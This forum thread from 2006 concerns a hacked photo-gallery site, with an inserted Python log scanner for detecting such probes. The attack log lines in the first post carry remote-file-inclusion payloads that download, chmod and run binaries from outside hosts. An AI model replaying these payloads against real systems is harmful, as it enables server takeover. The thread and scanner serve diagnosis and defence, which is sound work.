Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.

    • CommentAuthor: T2
    • CommentTime: Apr 17th 2006
    My site was hacked by someone doing a phishing scam. Here is the code my service provider sent me.
    ........................................................................................................................................
    It seems some files on your site are vulnerable to hack attempts. Every minute you get at least 5 hack attempts being made to your site. Here is a sample of the hack attempts:

    80.48.159.254 - - [05/Apr/2006:08:23:24 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    80.48.159.254 - - [05/Apr/2006:08:23:25 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    80.48.159.254 - - [05/Apr/2006:08:23:26 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    218.44.74.186 - - [07/Apr/2006:17:00:13 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    218.44.74.186 - - [07/Apr/2006:17:00:14 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    218.44.74.186 - - [07/Apr/2006:17:00:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    81.29.75.120 - - [10/Apr/2006:15:27:32 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .............................................................................................................................................

    Additionally they sent this:
    There were some password phishing files located at:

    http://fotograbber.com/gallery/mem_bin/FormsLogin.asp/source=halifaxcouk/Halifax/

    Is there a fix for this? I don't have a clue on how to correct this. My service provider is setting me up on another server so I can do a fresh install, but I want to make sure I set it up without being vulnerable to this or any other type of hacking.

    Admittedly, I never gave much thought to security or being hacked. The old "It can't happen to me" mentality. Lesson learned the hard way.

    It goes without saying, your help with this issue will be greatly appreciated.

    Best Regards,
    T2
    • CommentAuthor: mike
    • CommentTime: Apr 17th 2006
    What else do you have installed on your machine? Those really don't look like Plogger URLs. Based on the HTTP requests above, I would venture to say that this may have nothing to do with Plogger.

    You running Mambo?
    • CommentAuthor: T2
    • CommentTime: Apr 17th 2006
    I don't even know what Mambo is, so I would say no unless this is something that would already be on the server.

    With my limited knowledge (and limited it is) it looks to me like the hack has something to do with GLOBALS and the $GET variable.

    Is that possible?

    T2
    • CommentAuthor: mike
    • CommentTime: Apr 17th 2006
    The reason I say it is not Plogger is because none of the variable names in the URL exist in Plogger. $_Request[Itemid], this is not used in Plogger. mosConfig_absolutepath, nowhere to be found. Setting these variables through this "vulnerability" (hint: turn off REGISTER_GLOBALS) would have no effect on any Plogger installation.

    What's up with the file pathname "/mambo/index2.php"? Do you have a folder called mambo on your hosting account?
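The log sample in the first post and mike's point about register_globals both come down to one request shape: PHP superglobal names injected as query keys, a URL where a filesystem path is expected, and a download-chmod-execute chain in a `cmd` parameter. The following is an added example, not code from the thread or from Plogger, that scans Apache access-log lines for exactly those three markers; the first sample line is quoted from the provider's report above, the second is a constructed benign request.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: client, ident, user, [time], "METHOD url HTTP/x", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Query keys that only have an effect when register_globals is on
SUPERGLOBAL_KEY = re.compile(r'^(GLOBALS(\[|$)|_(REQUEST|GET|POST|COOKIE|SERVER)\[)')
# Download, chmod, then run from the current directory: a dropper chain
SHELL_CHAIN = re.compile(r'(wget|curl)[^;]*;\s*chmod[^;]*;\s*\./')

def analyze(line):
    """Return the parsed request plus a list of (rule, detail) findings, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m['url']).query
    findings = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_KEY.match(key):
            findings.append(('superglobal_injection', key))
        if value.lower().startswith(('http://', 'https://', 'ftp://')):
            findings.append(('remote_include', key))  # URL where a local path belongs
    if SHELL_CHAIN.search(unquote(query)):
        findings.append(('shell_chain', 'wget/curl -> chmod -> ./'))
    return {'ip': m['ip'], 'time': m['time'], 'status': m['status'],
            'url': m['url'], 'findings': findings}

def scan(lines):
    """Keep only the entries that triggered at least one rule."""
    return [r for r in map(analyze, lines) if r and r['findings']]

# Line 1 is quoted from the hosting provider's report in this thread; line 2 is a
# constructed benign request so the rules have something to ignore.
SAMPLE_LOG = [
    '80.48.159.254 - - [05/Apr/2006:08:23:24 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.0.0.5 - - [05/Apr/2006:09:00:00 -0400] "GET /gallery/index.php?level=album&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        # The 404 on the sample shows the probe aimed at a file that was not there,
        # which is what the thread concludes about the Mambo paths.
        print(hit['ip'], hit['status'], [rule for rule, _ in hit['findings']])
```

The `remote_include` rule is a heuristic: applications that legitimately pass URLs in query parameters will need that key allow-listed.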
    • CommentAuthor: T2
    • CommentTime: Apr 17th 2006
    No. However, I did have an index2.php when I was customizing the home page and wanted to have the original index file available just in case I screwed something up. The mambo part is a mystery to me.

    I just deleted the gallery and everything else I could on the original server so there is nothing to check there at this point. I hope this won't affect your ability to figure this out.

    If Plogger itself could not be hacked in this way, would you have any idea where the security gap could be?

    Thanks Mike,
    T2
    • CommentAuthor: (not captured on the page)
    I think this is a random attempt to hack a Mambo site that is not there... So Plogger should be safe enough from this. But such random attacks can put a big strain on a server and are a royal pain in .. yeah.. :-)

    In Mambo, index2 is usually the admin index file.
    • CommentAuthor: T2
    • CommentTime: Apr 19th 2006
    I think you're right. There were phishing files in my directory that I could not delete, which suggests the hack was at the server root. Thanks for your input.

    T2